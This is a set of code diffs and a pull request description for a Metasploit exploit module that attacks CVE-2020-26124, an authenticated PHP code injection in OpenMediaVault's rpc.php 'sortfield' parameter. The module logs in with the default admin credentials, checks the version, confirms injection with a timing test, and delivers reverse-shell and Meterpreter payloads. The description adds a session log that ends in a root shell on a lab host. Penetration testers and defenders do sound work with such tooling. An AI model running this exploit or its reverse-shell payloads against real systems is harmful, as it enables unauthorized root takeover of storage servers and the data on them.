     if res.code == 200
       version = get_target
       if version.nil?
@@ -169,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       delay = rand(7...15)
-      cmd = "\\\").usleep(#{delay}0000).(\\\""
+      cmd = "\").usleep(#{delay}0000).(\""
       print_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
       t1 = Time.now.to_i
       res = execute_command(cmd)

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -191,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     res = login(user, pass)
     unless res
-      return CheckCode::Unknown("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
+      fail_with(Failure::NoAccess, 'Authentication failed')
     end
 
     version = get_target

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
           \"id\":\"apt_history\",
           \"start\":0,
           \"limit\":50,
-          \"sortfield\":\"'.exec(#{cmd}).'\",
+          \"sortfield\":\"'.exec(\\\"#{cmd}\\\").'\",
           \"sortdir\":\"DESC\"
         },
         \"options\":null
@@ -169,18 +169,18 @@ class MetasploitModule < Msf::Exploit::Remote
         return CheckCode::Safe
       end
 
-      delay = rand(5...10)
-      cmd = "usleep(#{delay}0000)"
-      print_status("#{peer} - Verifying remote code execution by attempting to execute '#{cmd}'.")
+      delay = rand(7...15)
+      cmd = "\\\").usleep(#{delay}0000).(\\\""
+      print_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
       t1 = Time.now.to_i
       res = execute_command(cmd)
       t2 = Time.now.to_i
       unless res
-        print_error("#{peer} - Connection failed whilst trying to perform the command injection.")
+        print_error("#{peer} - Connection failed whilst trying to perform the code injection.")
         return CheckCode::Detected
       end
       diff = t2 - t1
-      if diff >= delay
+      if diff >= 3
         print_good("#{peer} - Response received after #{diff} seconds.")
         return CheckCode::Vulnerable
       else
@@ -207,7 +207,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
       case target['Type']
       when :unix_memory
-        execute_command(payload.encoded.gsub('"', '\"'))
+        execute_command(payload.encoded)
       when :linux_dropper
         execute_cmdstager(linemax: 130_000)
       end

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -4,7 +4,7 @@
 ##
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
-  include Msf::Exploit::Remote::AutoCheck
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
   def initialize(info = {})
@@ -15,14 +15,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module exploits an authenticated PHP code injection
           vulnerability found in openmediavault versions before 4.1.36
-          and 5.x versions before 5.5.12 inclusive in the `sortfield`
-          POST parameter of the `rpc.php` page, because `json_encode_safe()`
+          and 5.x versions before 5.5.12 inclusive in the "sortfield"
+          POST parameter of the rpc.php page, because "json_encode_safe()"
           is not used in config/databasebackend.inc.
-          Successful exploitation grants attackers to perform arbitrary
-          command execution on the underlying operating system as root.
+          Successful exploitation grants attackers the ability to execute
+          arbitrary commands on the underlying operating system as root.
         },
         'Author' => [
-          'Anastasios Stasinopoulos (@ancst)' # Obrela Labs Team - Discovery and Metasploit module
+          'Anastasios Stasinopoulos' # @ancst of Obrela Labs Team - Discovery and Metasploit module
         ],
         'References' => [
           ['CVE', '2020-26124'],
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     return res
   rescue ::Rex::ConnectionError
-    print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
+    print_error('Rex::ConnectionError caught in login(), could not connect to the target.')
     return nil
   end
 
@@ -157,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }.to_json
     })
   rescue ::Rex::ConnectionError
-    fail_with(Failure::Unreachable, 'Connection failed.')
+    fail_with(Failure::Unreachable, 'Rex::ConnectionError caught in execute_command(), could not connect to the target.')
   end
 
   def check

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -4,6 +4,7 @@
 ##
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
+  include Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
   def initialize(info = {})
@@ -13,15 +14,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'OpenMediaVault rpc.php Authenticated PHP Code Injection',
         'Description' => %q{
           This module exploits an authenticated PHP code injection
-          vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12
-          inclusive in the "sortfield" POST parameter of "rpc.php" page,
-          because json_encode_safe is not used in config/databasebackend.inc.
-          Successful exploitation allows arbitrary command execution
-          on the underlying operating system as root.
+          vulnerability found in openmediavault versions before 4.1.36 
+          and 5.x versions before 5.5.12 inclusive in the `sortfield` 
+          POST parameter of the `rpc.php` page, because `json_encode_safe()` 
+          is not used in config/databasebackend.inc.
+          Successful exploitation grants attackers to perform arbitrary 
+          command execution on the underlying operating system as root.
         },
         'Author' => [
-          # Obrela Labs Team - Discovery and Metasploit module
-          'Anastasios Stasinopoulos (@ancst)'
+          'Anastasios Stasinopoulos (@ancst)' # Obrela Labs Team - Discovery and Metasploit module
         ],
         'References' => [
           ['CVE', '2020-26124'],
@@ -102,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil
   end
 
-  def get_target(_opts = {})
+  def get_target()
     print_status("#{peer} - Trying to detect if target is running a supported version of OpenMediaVault.")
     res = send_request_cgi({
       'uri' => @uri,
@@ -126,7 +127,6 @@ class MetasploitModule < Msf::Exploit::Remote
     if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
       return nil
     end
-
     return version
   end
 
@@ -159,11 +159,10 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if @cookie.nil?
-      vprint_error("#{peer} - Failed to authenticate with OpenMediaVault.")
-      return Exploit::CheckCode::Unknown
+      return Exploit::CheckCode::Unknown("Failed to authenticate with OpenMediaVault on #{peer} using #{user}:#{pass}")
     end
 
-    vprint_good("#{peer} - Successfully authenticated with OpenMediaVault.")
+    print_good("#{peer} - Successfully authenticated with OpenMediaVault using #{user}:#{pass}.")
     version = get_target
     if version.nil?
       # We don't print out an error message here as returning this will
@@ -173,44 +172,27 @@ class MetasploitModule < Msf::Exploit::Remote
 
     delay = rand(7...15)
     cmd = "\").usleep(#{delay}0000).(\""
-    vprint_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
+    print_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
     t1 = Time.now.to_i
     res = execute_command(cmd)
     t2 = Time.now.to_i
     unless res
-      vprint_error("#{peer} - Connection failed whilst trying to perform the code injection.")
+      print_error("#{peer} - Connection failed whilst trying to perform the code injection.")
       return CheckCode::Detected
     end
     diff = t2 - t1
     if diff >= 3
-      vprint_good("#{peer} - Response received after #{diff} seconds.")
+      print_good("#{peer} - Response received after #{diff} seconds.")
       return CheckCode::Vulnerable
     end
-    vprint_error("#{peer} - Response wasn't received within the expected period of time.")
+    print_error("#{peer} - Response wasn't received within the expected period of time.")
     return CheckCode::Safe
   rescue ::Rex::ConnectionError
-    vprint_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
+    print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
     return CheckCode::Unknown
   end
 
   def exploit
-    res = login(user, pass)
-    unless res
-      fail_with(Failure::Unknown, "No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
-    end
-
-    if @cookie.nil?
-      fail_with(Failure::NoAccess, 'Authentication failed')
-    end
-
-    print_good("#{peer} - Successfully authenticated with OpenMediaVault.")
-    version = get_target
-    if version.nil?
-      # We don't print out an error message here as returning this will
-      # automatically cause Metasploit to print out an appropriate error message.
-      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
-    end
-
     print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
     case target['Type']
     when :unix_memory

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -198,7 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if version.nil?
       # We don't print out an error message here as returning this will
       # automatically cause Metasploit to print out an appropriate error message.
-      return CheckCode::Safe
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
     end
 
     print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -183,10 +183,9 @@ class MetasploitModule < Msf::Exploit::Remote
       if diff >= 3
         print_good("#{peer} - Response received after #{diff} seconds.")
         return CheckCode::Vulnerable
-      else
-        print_error("#{peer} - Response wasn't received within the expected period of time.")
-        return CheckCode::Safe
       end
+      print_error("#{peer} - Response wasn't received within the expected period of time.")
+      return CheckCode::Safe
     end
   rescue ::Rex::ConnectionError
     print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -124,7 +124,14 @@ class MetasploitModule < Msf::Exploit::Remote
       return nil
     end
     print_good("#{peer} - Identified OpenMediaVault version #{version}.")
-    if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
+    version_gemmed = Gem::Version.new(version)
+    if version_gemmed < Gem::Version.new('3.0.1')
+      return version
+    elsif version_gemmed >= Gem::Version.new('4.0.0') && version_gemmed < Gem::Version.new('4.1.36')
+      return version
+    elsif version_gemmed >= Gem::Version.new('5.0.0') && version_gemmed < Gem::Version.new('5.5.12')
+      return version
+    else
       return nil
     end
 

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -158,8 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = login(user, pass)
     unless res
-      print_error("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
-      return CheckCode::Detected
+      return CheckCode::Unknown("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
     end
     if res.code == 200
       version = get_target

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     res = login(user, pass)
     unless res
-      fail_with(Failure::NoAccess, 'Authentication failed')
+      fail_with(Failure::Unknown, "No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
     end
 
     if @cookie.nil?

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -55,22 +55,23 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),
-        OptString.new('HttpPassword', [ true, 'Password to login with', 'openmediavault']),
+        OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault installation', '/']),
+        OptString.new('USERNAME', [true, 'The OpenMediaVault username to authenticate with', 'admin']),
+        OptString.new('PASSWORD', [true, 'The OpenMediaVault password to authenticate with', 'openmediavault'])
       ]
     )
   end
 
   def user
-    datastore['HttpUsername']
+    datastore['USERNAME']
   end
 
   def pass
-    datastore['HttpPassword']
+    datastore['PASSWORD']
   end
 
   def login(user, pass, _opts = {})
-    print_status("#{peer} - Authenticating with OpenMediaVault using \"#{user}:#{pass}\"...")
+    print_status("#{peer} - Authenticating with OpenMediaVault using #{user}:#{pass}...")
     @uri = normalize_uri(target_uri.path, '/rpc.php')
     res = send_request_cgi({
       'uri' => @uri,

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -200,11 +200,10 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if @cookie.nil?
-      print_error("#{peer} - Failed to authenticate with OpenMediaVault.")
-      return false
-    else
-      print_good("#{peer} - Successfully authenticated with OpenMediaVault.")
+      fail_with(Failure::NoAccess, 'Authentication failed')
     end
+
+    print_good("#{peer} - Successfully authenticated with OpenMediaVault.")
     version = get_target
     if version.nil?
       # We don't print out an error message here as returning this will

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -14,11 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'OpenMediaVault rpc.php Authenticated PHP Code Injection',
         'Description' => %q{
           This module exploits an authenticated PHP code injection
-          vulnerability found in openmediavault versions before 4.1.36 
-          and 5.x versions before 5.5.12 inclusive in the `sortfield` 
-          POST parameter of the `rpc.php` page, because `json_encode_safe()` 
+          vulnerability found in openmediavault versions before 4.1.36
+          and 5.x versions before 5.5.12 inclusive in the `sortfield`
+          POST parameter of the `rpc.php` page, because `json_encode_safe()`
           is not used in config/databasebackend.inc.
-          Successful exploitation grants attackers to perform arbitrary 
+          Successful exploitation grants attackers to perform arbitrary
           command execution on the underlying operating system as root.
         },
         'Author' => [
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil
   end
 
-  def get_target()
+  def get_target
     print_status("#{peer} - Trying to detect if target is running a supported version of OpenMediaVault.")
     res = send_request_cgi({
       'uri' => @uri,
@@ -127,6 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
       return nil
     end
+
     return version
   end
 

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -161,9 +161,9 @@ class MetasploitModule < Msf::Exploit::Remote
     if @cookie.nil?
       vprint_error("#{peer} - Failed to authenticate with OpenMediaVault.")
       return Exploit::CheckCode::Unknown
-    else
-      vprint_good("#{peer} - Successfully authenticated with OpenMediaVault.")
     end
+
+    vprint_good("#{peer} - Successfully authenticated with OpenMediaVault.")
     version = get_target
     if version.nil?
       # We don't print out an error message here as returning this will

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -11,13 +11,13 @@ class MetasploitModule < Msf::Exploit::Remote
       update_info(
         info,
         'Name' => 'OpenMediaVault rpc.php Authenticated PHP Code Injection',
-        'Description' => %q{.
+        'Description' => %q{
           This module exploits an authenticated PHP code injection
-          vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12 
-          inclusive in the "sortfield" POST parameter of "rpc.php" page, 
-          because json_encode_safe is not used in config/databasebackend.inc. 
-          Successful exploitation allows arbitrary command execution 
-          on the underlying operating system as root. 
+          vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12
+          inclusive in the "sortfield" POST parameter of "rpc.php" page,
+          because json_encode_safe is not used in config/databasebackend.inc.
+          Successful exploitation allows arbitrary command execution
+          on the underlying operating system as root.
         },
         'Author' => [
           # Obrela Labs Team - Discovery and Metasploit module
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2020-26124'],
-          ['URL', 'https://www.openmediavault.org/?p=2797'] 
+          ['URL', 'https://www.openmediavault.org/?p=2797']
         ],
         'License' => MSF_LICENSE,
         'Platform' => ['unix', 'linux'],
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'uri' => @uri,
       'method' => 'POST',
-      'cookie' => "#{@cookie}",
+      'cookie' => @cookie.to_s,
       'data' => "{
         \"service\":\"System\",
         \"method\":\"getInformation\",
@@ -92,6 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
       return nil
     end
+
     return version
   end
 
@@ -117,6 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # specifically with their own unique error message.
       return nil
     end
+
     if res.code == 200
       print_good("#{peer} - Authenticated successfully.")
       @cookie = res.get_cookies
@@ -135,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
       'uri' => @uri,
       'method' => 'POST',
-      'cookie' => "#{@cookie}",
+      'cookie' => @cookie.to_s,
       'data' => "{
           \"service\":\"LogFile\",
           \"method\":\"getList\",
@@ -160,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Detected
     end
     if res.code == 200
-      version = get_target()
+      version = get_target
       if version.nil?
         # We don't print out an error message here as returning this will
         # automatically cause Metasploit to print out an appropriate error message.
@@ -197,7 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
     end
     if res.code == 200
-      version = get_target()
+      version = get_target
       if version.nil?
         print_error("#{peer} - The target is not vulnerable.")
         return false

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -74,14 +74,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => @uri,
       'method' => 'POST',
       'cookie' => @cookie.to_s,
-      'data' => "{
-        \"service\":\"System\",
-        \"method\":\"getInformation\",
-        \"params\":null,
-        \"options\":{
-          \"updatelastaccess\":false
+      'data' => {
+        "service": "System",
+        "method": "getInformation",
+        "params": nil,
+        "options": {
+          "updatelastaccess":false
         }
-      }"
+      }.to_json
     })
     version = res.body.scan(/"version\":\"(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
     if version.nil?

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -1,0 +1,217 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenMediaVault rpc.php Authenticated PHP Code Injection',
+        'Description' => %q{.
+          This module exploits an authenticated PHP code injection
+          vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12 
+          inclusive in the "sortfield" POST parameter of "rpc.php" page, 
+          because json_encode_safe is not used in config/databasebackend.inc. 
+          Successful exploitation allows arbitrary command execution 
+          on the underlying operating system as root. 
+        },
+        'Author' => [
+          # Obrela Labs Team - Discovery and Metasploit module
+          'Anastasios Stasinopoulos (@ancst)'
+        ],
+        'References' => [
+          ['CVE', '2020-26124'],
+          ['URL', 'https://www.openmediavault.org/?p=2797'] 
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Payload' => { 'BadChars' => "\x00" },
+        'DisclosureDate' => 'Sept 28 2020',
+        'Targets' =>
+          [
+            [
+              'Automatic (Linux Dropper)',
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            ],
+            [
+              'Automatic (Unix In-Memory)',
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            ]
+          ],
+        'Privileged' => false,
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'openmediavault']),
+      ]
+    )
+  end
+
+  def user
+    datastore['HttpUsername']
+  end
+
+  def pass
+    datastore['HttpPassword']
+  end
+
+  def get_target(_opts = {})
+    res = send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'cookie' => "#{@cookie}",
+      'data' => "{
+        \"service\":\"System\",
+        \"method\":\"getInformation\",
+        \"params\":null,
+        \"options\":{
+          \"updatelastaccess\":false
+        }
+      }"
+    })
+    version = res.body.scan(/"version\":\"(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
+    if version.nil?
+      print_error("#{peer} - Unable to grab version of OpenMediaVault installed on target!")
+      return nil
+    end
+    print_good("#{peer} - OpenMediaVault version #{version} identified.")
+    if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
+      return nil
+    end
+    return version
+  end
+
+  def login(user, pass, _opts = {})
+    @uri = normalize_uri(target_uri.path, '/rpc.php')
+    print_status("#{peer} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    res = send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'data' => "{
+        \"service\":\"Session\",
+        \"method\":\"login\",
+        \"params\":{
+          \"username\":\"#{user}\",
+          \"password\":\"#{pass}\"
+        },
+        \"options\":null
+      }",
+      'ctype' => 'application/json'
+    })
+    unless res
+      # We return nil here, as callers should handle this case
+      # specifically with their own unique error message.
+      return nil
+    end
+    if res.code == 200
+      print_good("#{peer} - Authenticated successfully.")
+      @cookie = res.get_cookies
+    elsif res.code == 401
+      print_error("#{peer} - Authentication failed.")
+    else
+      print_error("#{peer} - The host responded with an unexpected status code: #{res.code}.")
+    end
+    return res
+  rescue ::Rex::ConnectionError
+    print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
+    return nil
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'cookie' => "#{@cookie}",
+      'data' => "{
+          \"service\":\"LogFile\",
+          \"method\":\"getList\",
+          \"params\":{
+          \"id\":\"apt_history\",
+          \"start\":0,
+          \"limit\":50,
+          \"sortfield\":\"'.exec(#{cmd}).'\",
+          \"sortdir\":\"DESC\"
+        },
+        \"options\":null
+      }"
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def check
+    res = login(user, pass)
+    unless res
+      print_error("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
+      return CheckCode::Detected
+    end
+    if res.code == 200
+      version = get_target()
+      if version.nil?
+        # We don't print out an error message here as returning this will
+        # automatically cause Metasploit to print out an appropriate error message.
+        return CheckCode::Safe
+      end
+
+      delay = rand(5...10)
+      cmd = "usleep(#{delay}0000)"
+      print_status("#{peer} - Verifying remote code execution by attempting to execute '#{cmd}'.")
+      t1 = Time.now.to_i
+      res = execute_command(cmd)
+      t2 = Time.now.to_i
+      unless res
+        print_error("#{peer} - Connection failed whilst trying to perform the command injection.")
+        return CheckCode::Detected
+      end
+      diff = t2 - t1
+      if diff >= delay
+        print_good("#{peer} - Response received after #{diff} seconds.")
+        return CheckCode::Vulnerable
+      else
+        print_error("#{peer} - Response wasn't received within the expected period of time.")
+        return CheckCode::Safe
+      end
+    end
+  rescue ::Rex::ConnectionError
+    print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
+    return CheckCode::Unknown
+  end
+
+  def exploit
+    res = login(user, pass)
+    unless res
+      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
+    end
+    if res.code == 200
+      version = get_target()
+      if version.nil?
+        print_error("#{peer} - The target is not vulnerable.")
+        return false
+      end
+      print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
+      case target['Type']
+      when :unix_memory
+        execute_command(payload.encoded.gsub('"', '\"'))
+      when :linux_dropper
+        execute_cmdstager(linemax: 130_000)
+      end
+    end
+  rescue ::Rex::ConnectionError
+    print_error('Rex::ConnectionError caught in check(), could not connect to the target.')
+    return false
+  end
+end


### PR DESCRIPTION
This module exploits an authenticated PHP code injection vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12  inclusive in the `sortfield` POST parameter of `rpc.php` page, because json_encode_safe is not used in `config/databasebackend.inc`. Successful exploitation allows arbitrary command execution on the underlying operating system as `root`.

**Usage Example**
```
msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options

Module options (exploit/unix/webapp/openmediavault_rpc_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   openmediavault   yes       The OpenMediaVault password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI path of the OpenMediaVault installation
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       The OpenMediaVault username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
rhosts => 192.168.56.108
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
lhost => 192.168.56.105
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.105:4444
[*] 192.168.56.108:80 - Authenticating with OpenMediaVault using admin:openmediavault...
[+] 192.168.56.108:80 - Successfully authenticated with OpenMediaVault.
[*] 192.168.56.108:80 - Trying to detect if target is running a supported version of OpenMediaVault.
[+] 192.168.56.108:80 - Identified OpenMediaVault version 5.5.11.
[*] 192.168.56.108:80 - Sending payload (150 bytes)...
[*] Sending stage (976712 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : 192.168.56.108
OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 1499 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
```